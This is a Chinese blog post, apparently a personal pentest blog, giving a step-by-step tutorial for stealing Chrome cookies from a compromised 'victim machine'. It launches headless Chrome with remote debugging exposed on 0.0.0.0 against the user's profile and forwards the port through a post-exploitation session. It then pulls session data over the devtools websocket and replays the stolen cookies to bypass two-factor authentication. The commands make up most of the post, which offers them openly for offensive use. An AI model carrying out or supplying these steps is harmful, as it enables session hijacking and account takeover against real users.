侧边栏壁纸
博主头像
fynn博主等级

我们应该有恒心,尤其是要有自信心,必须相信自己是有能力的,而且要不惜任何代价把这种能力发挥出来。

  • 累计撰写 50 篇文章
  • 累计创建 21 个标签
  • 累计收到 0 条评论

目 录CONTENT

文章目录

谷歌调试模式:绕过2FA认证

fynn
2023-10-16 / 0 评论 / 0 点赞 / 199 阅读 / 286 字 / 正在检测是否收录...

远程窃取Chrome Cookie

执行代码

"C:\Progra~2\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless --user-data-dir=C:\Users\Administrator\AppData\Local\Google\Chrome\USERDA~1 -remote-debugging-addres=0.0.0.0 --ignore-certificate-errors

image-1697463074548

  • 然后使用端口转发或者内网穿透,使其公网可访问
  • 比如:受害机9222端口转发到9221端口上
  • 本地打开谷歌浏览器输入
chrome://inspect/#devices

image-1697463367760

  • 点击 Configure,设置监听的端口,这里我选择的是 9221,然后点击 Done
    image-1697463381723
  • 如果对方访问网页,就能在这里看到访问的所有网页:

image-1697463394274

  • 上线开启谷歌浏览器调试模式
execute -P 2184 "c:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless  --user-data-dir=C:\Users\Administrator\AppData\Local\Google\Chrome\USERDA~1
  • 端口转发
portfwd add -r 127.0.0.0:9222

image-1697463442610

  • 将Chrome通过隧道连接
curl http://localhost:8080/jso
  • 使用websocket 请求获取到的值
wsc ws://localhost:8080/devtools/page/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx

image-1697463480190

  • 使用窃取的cookie凭证访问Web应用程序
    image-1697463491793

  • 注意:无论是否设置了双因素身份验证(在这里已启用),Cookie都可以提供访问权限。

0

评论区